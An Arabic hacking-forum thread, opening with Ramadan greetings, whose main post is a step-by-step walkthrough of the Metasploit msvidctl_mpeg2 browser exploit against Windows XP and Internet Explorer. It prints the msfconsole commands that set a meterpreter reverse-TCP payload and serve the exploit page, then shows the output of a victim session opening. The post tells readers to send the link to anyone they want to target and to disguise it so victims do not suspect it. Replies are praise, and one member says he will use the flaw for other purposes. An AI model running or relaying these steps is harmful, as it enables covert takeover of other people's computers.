بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

تم تحميل الصفحة في 1,5391583 ثانية
بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
6 مايو 2009
المشاركات
1,710
الإعجابات
161
النقاط
0
العمر
25



.. اليوم على ارض الديف بوينت ارض المحبه والعطاء ..

.. نقدم لكم شرح ثغرة Microsoft DirectShow (msvidctl.dll) القاتلة ..


{ارجوا الا يكون الموضوع مكرر}

بمناسبة قدوم شهر الكريم شهر رمضان وكل عام وانتم بخير..

::: في رمضــــان :::

صافح قلبك

ابتسم لذاتك

صالح نفسك

وأطلق أسر أحزانك

وعلّم همومك الطيران بعيدا عنك



=====================================
اليوم راح اشرح لكم اخطر ثغرهـ ][ Microsoft ][..

وهاذي ثغرة محقونة في ملف مهم من الويندوز وهو ملف msvidctl.dll وهذا الملف

معروف بأنه ملف ActiveX هذا الملف الذي يتحكم بالصورة أظن بأن الكل يعرفه:

واسم الثغرهـــــــــــــــــ:

IE DirectShow (msvidctl.dll) MPEG-2

وقد تمت اضافة الثغرة الى التحديث الاخير للميتاسبلوات باسم

Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption

وهذا ما سأعتمد عليه في الشرح

البسيط أرجوا أن لا يكون الشرح صعب لأنه بالنسبة لي لم يكن كذلك فأرجوا أن يكون بالنسبة

لكم أيضا أحبائي المهم وبدون اطالة نبدأمع الشرح:

نقوم بفتح الميتا سبلوات وهذا بعد أخر تحديث طبعا




[email protected]:~/svn/msf3-dev$ sudo ./msfconsole

[sudo] password for carlos:

| | _) |

__ `__ \ _ \ __| _` | __| __ | _ | __|

| | | __/ | ( |__ | | | ( | | |

_| _| _|___|__|__,_|____/ .__/ _|___/ _|__|

_|

=[ msf v3.3-dev

+ -- --=[ 384 exploits - 261 payloads

+ -- --=[ 20 encoders - 7 nops

=[ 166 aux

msf >
نقوم باختيار هذا.. اهم شي

PAYLOAD => windows/meterpreter/reverse_tcp

شوف الخيارات :

msf > use exploit/windows/browser/msvidctl_mpeg2

msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(msvidctl_mpeg2) > show options

Module options:

**** Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 0.0.0.0 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Use SSL

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

**** Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The local address

LPORT 4444 yes The local port

Exploit target:

Id ****

-- ----

0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
يطلع لنا بعد ذلك.. التالي:

كود PHP:
msf exploit(msvidctl_mpeg2) > set SRVPORT 80

SRVPORT => 80

msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158

LHOST => 192.168.1.158

msf exploit(msvidctl_mpeg2) > set URIPATH ChOrAhBiL SaFa7.html

URIPATH => ChOrAhBiL SaFa7.html

msf exploit(msvidctl_mpeg2) > exploit
[*] Exploit running as background job.

msf exploit(msvidctl_mpeg2) >

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Using URL:]http://0.0.0.0:80/ChOrAhBiLSaFa7.html

[*] Local IP: http://192.168.1.158:80/ChOrAhBiLSaFa7.html


[*] Server started
بعد ذلك نتتج لنا ملف من نوع gif نقوم بارساله هو والرابط لأي أحد تبي استهدافه

http://192.168.1.158:80/ChOrAhBiL SaFa7.html

هذا الرابط لمن لم يفهم من الاحسن تمويه الرابط بمواقع التمويه لأنه ممكن يشك فيه هيك

بعدما يفتح الضحية الرابط ستمكننا الاكسبلورر من الاستغلال لاحظـــــوا:


[*] Sending HTML to 192.168.1.139:1126...

[*] Sending exploit to 192.168.1.139:1126...

[*] Sending GIF to 192.168.1.139:1126...

[*] Transmitting intermediate stager for over-sized stage...(216 bytes)

[*] Sending stage (206848 bytes)

[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1127)

msf exploit(msvidctl_mpeg2) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >


][..أرجواُ أن لا يكًٍون الشُرحٍ صعًَُب علىأ أحًٍد وان ًٍشاء اَللهِ اِلكَل يفهٌُم الُشرح..][

][ إأهًُدأٍُإأء خأإًأص الىا حبٌُااًٍيبًٍُِ..."
][
=

=

:32:دحوم , القحطآني:32:

:32:Mr.Mh$TEr:32:

:32:Xsmart:32:

:32:ولد بوعدنان:32:

:32:Mr.dunhill:32:

:32:ḲạṣḄẹṚ- ҏạḶ:32:

:32:mèşĦŏŐő-ĦâčĶēŔ:32:

:32:ĶInĝ ĐĂгҚ:32:


بدون ورده ... الورده خلصت

Єvïɬ

hSoN HaCkEr

Coffin Of Evil

Anti-Trojan


][اًٍسسٌُف إذا نسٌيُتٍِ احٍد ايإمـ سٌُورًٍي][

][لاتنسون التقييم][




شهر الصيام اهلا ً ومرحب وسهلين
شهر الهدايا من عزيـز الجلالي

يالله عسانا في صيامه عتيقين
ونرجي من الله الرضا والكمالي

يااحبتي ياصحبتي ياعزيـزين
حبيت اهنيكم ويرتااااااح بالي


رضى الله عنك وأرضاك
وأعطاك وكفاك ....
وهداك وأغناك ....
وعافاك وشفاك ....
ووفقك لخيرالدعـاء..
وأجاب لك الرجاء..
وأحبك بلا ابتـلاء..
وجعلك ساعيا
"للخير مؤثرا" فى الغير
وآمنك بين أهلك
وأدخلك الجنة.
مبارك ‏عليك شهر الصوم


:32:
:32::32:
:32::32::32:

][لاتنسون التقييم][

:32::32::32:
:32::32:
:32:



##############

منقول من شرحبيل السفاح

http://www.dev-point.com/vb/t53523.html
 

K0JAK

ExpErt DeveloPer
rankrankrankrankrank
إنضم
2 يونيو 2009
المشاركات
2,496
الإعجابات
267
النقاط
83
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

قمة فى التنظيم و الموضوع اكيبر من دلك بكثير

تسلم ايديك يا حبيبى و رمضان كريم و انشاء الله

نصمو ايمانا و احتساب

موفق
 
إنضم
6 مايو 2009
المشاركات
1,710
الإعجابات
161
النقاط
0
العمر
25
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

قمة فى التنظيم و الموضوع اكيبر من دلك بكثير

تسلم ايديك يا حبيبى و رمضان كريم و انشاء الله

نصمو ايمانا و احتساب

موفق
][ هلا وغلا اخوي منور الموضوع فديتك..تسلم يمناك على ردك ][
 

K0JAK

ExpErt DeveloPer
rankrankrankrankrank
إنضم
2 يونيو 2009
المشاركات
2,496
الإعجابات
267
النقاط
83
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

يجب أن تضع للبعض سمعات قبل إعطائها إلى Đ.ẂĬńĎ-ًِXَp مرة أخرى.:31:
 

Dr.AdNaN

.:: Legends DeveloPer ::.
rankrankrankrank
إنضم
26 ديسمبر 2006
المشاركات
1,797
الإعجابات
553
النقاط
113
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة





فديتـك !

شرح رآئـع ومنضـم !

ألف شكر لـك .. وجآري أستغلآل الثغرة في أمور أخرى :13: !

أحلى تقيـم .. لك ولموضوعك !

بآرك الله فيـك :24:

 
إنضم
2 أغسطس 2008
المشاركات
5,765
الإعجابات
302
النقاط
0
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

يعطيك الف عافيه

تستاهل التقييم

:32:
 

Dr.AdNaN

.:: Legends DeveloPer ::.
rankrankrankrank
إنضم
26 ديسمبر 2006
المشاركات
1,797
الإعجابات
553
النقاط
113
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

الذين يشاهدون محتوى الموضوع الآن : 5 ( الأعضاء 5 والزوار 0)
‏ولد بوعدنان, ‏Anti-Trojan+, ‏معدي المرقاب, ‏hSoN HaCkEr+, ‏Xsmart+

^^

3 مشرفيـن :9:
 

Mr.CuTe

Beginner Developer
rank
إنضم
24 يونيو 2009
المشاركات
41
الإعجابات
0
النقاط
0
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

ثانكس اخوي علي الموضوع الحلو والرائع = وما شاء الله : ثلاث مشرفين ههههههههه : ما شاء الله مرو على موصوعك : هذا يدل ان موضوعك له هيبه وانت لك هيبه فديتك . تـــقبل . مروري :8:
 
إنضم
6 مايو 2009
المشاركات
1,710
الإعجابات
161
النقاط
0
العمر
25
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة





فديتـك !

شرح رآئـع ومنضـم !

ألف شكر لـك .. وجآري أستغلآل الثغرة في أمور أخرى :13: !

أحلى تقيـم .. لك ولموضوعك !

بآرك الله فيـك :24:



][فديت روحك يابو عدنان انت شكلك بتجيب العيد في الثغره لانك مبدع يا مشرفنا تسلم على ردك وتقيمك.][
 
إنضم
6 مايو 2009
المشاركات
1,710
الإعجابات
161
النقاط
0
العمر
25
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

يعطيك الف عافيه

تستاهل التقييم

:32:
][الله يعافيك ياقلبي يكفيني مرورك لبى قلبك..][
 
إنضم
6 مايو 2009
المشاركات
1,710
الإعجابات
161
النقاط
0
العمر
25
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

ثانكس اخوي علي الموضوع الحلو والرائع = وما شاء الله : ثلاث مشرفين ههههههههه : ما شاء الله مرو على موصوعك : هذا يدل ان موضوعك له هيبه وانت لك هيبه فديتك . تـــقبل . مروري :8:
][هلا وغلا اخوي الف شكر ع ردك الجميل.. يسلم يمناك.][
 
إنضم
19 يناير 2009
المشاركات
2,455
الإعجابات
531
النقاط
0
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

[وه بس مـآأحلى ـآ نكي من بينهم] :29:

[فديتك وربي مبدع كعـآدتك أنت النـور الســآطع من بع ـيد والكل |زآحف+أعرج+أعور+أحدب| ذآهبـون ألى هذآ النور]

[لآأستغرب هذآ منك يـآ حبيبي]

[تستـآهل التقييم أنـ امكن وتستـآهل الفـآيف ستـآر]

:32:

...​
 
إنضم
16 فبراير 2009
المشاركات
6,810
الإعجابات
4,169
النقاط
113
الإقامة
أ‡أ،أ“أڑأ¦أڈأ­أ‰ آ، أ‡أ،أ‘أ­أ‡أ–
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

يعطيك الف عافيه يالغالي ويندوز آكس بي

ماقصرت فديتـك

ثغره خطير لكن اعتقد مكرر الموضوع هذا والله اعلــم

تقبل مروري وتقييمي :9:
 
إنضم
3 نوفمبر 2007
المشاركات
3,614
الإعجابات
681
النقاط
113
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

:31: يعطيك العافيه :30:


والله فات علي الشرح لو كنت على جهازي الحين اشوفه لاكن بمقهى :<؛ :30:


يالله على كل حال مشكور اخوي وتسلم ولي رجعه فيمـآ بعد
 
إنضم
6 مايو 2009
المشاركات
1,710
الإعجابات
161
النقاط
0
العمر
25
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

[وه بس مـآأحلى ـآ نكي من بينهم] :29:

[فديتك وربي مبدع كعـآدتك أنت النـور الســآطع من بع ـيد والكل |زآحف+أعرج+أعور+أحدب| ذآهبـون ألى هذآ النور]

[لآأستغرب هذآ منك يـآ حبيبي]

[تستـآهل التقييم أنـ امكن وتستـآهل الفـآيف ستـآر]

:32:

...​
][وهـ بس انت منور قلبي الله ينور قلبك قول آميين ربي يعافيك ويطول بعمرك وتسلم ع ردك وتقييم..][
 

4math

DeveloPer Plus
rankrankrankrank
إنضم
3 أبريل 2009
المشاركات
1,255
الإعجابات
64
النقاط
48
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

شكرا ليك حبيبي ابدعت فتميزت

بارك الله فيك :::::::::::::.. واااااااصل :32:
 

anT!-Tr0J4n

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
7 يناير 2008
المشاركات
5,504
الإعجابات
386
النقاط
83
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

يعطيك الف عافية يابطل

شرح واضح ومنظم

احلى تقيم ،،

:9:
 
إنضم
6 مايو 2009
المشاركات
1,710
الإعجابات
161
النقاط
0
العمر
25
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

يعطيك الف عافيه يالغالي ويندوز آكس بي

ماقصرت فديتـك

ثغره خطير لكن اعتقد مكرر الموضوع هذا والله اعلــم

تقبل مروري وتقييمي :9:
][الله يعافيك يا حسوون وفديت هد الطلهـ الحلوهـ,..يسلم يمناك ياحسون انت منبع الحياه][

][مشكور ع تقيمك وردك امواااه ع خششمك][

ج//اذا كان مكرر انا لله وانا اليه راجعون..
 
إنضم
6 مايو 2009
المشاركات
1,710
الإعجابات
161
النقاط
0
العمر
25
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

:31: يعطيك العافيه :30:


والله فات علي الشرح لو كنت على جهازي الحين اشوفه لاكن بمقهى :<؛ :30:


يالله على كل حال مشكور اخوي وتسلم ولي رجعه فيمـآ بعد
][الله يعافيك اخوي عبدالله وتسلم ع ردك الجميل..][
 
إنضم
6 مايو 2009
المشاركات
1,710
الإعجابات
161
النقاط
0
العمر
25
رد: بمنإسبة قدووم شهر رمضإن..المبإركـ اقدم لك شرح ثغرةMicrosoft DirectShow (msvidctl.dll) القاتلة

شكرا ليك حبيبي ابدعت فتميزت

بارك الله فيك :::::::::::::.. واااااااصل :32:
][هلا وغلا بطارق منور حبيب قلبي فديتك..][
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل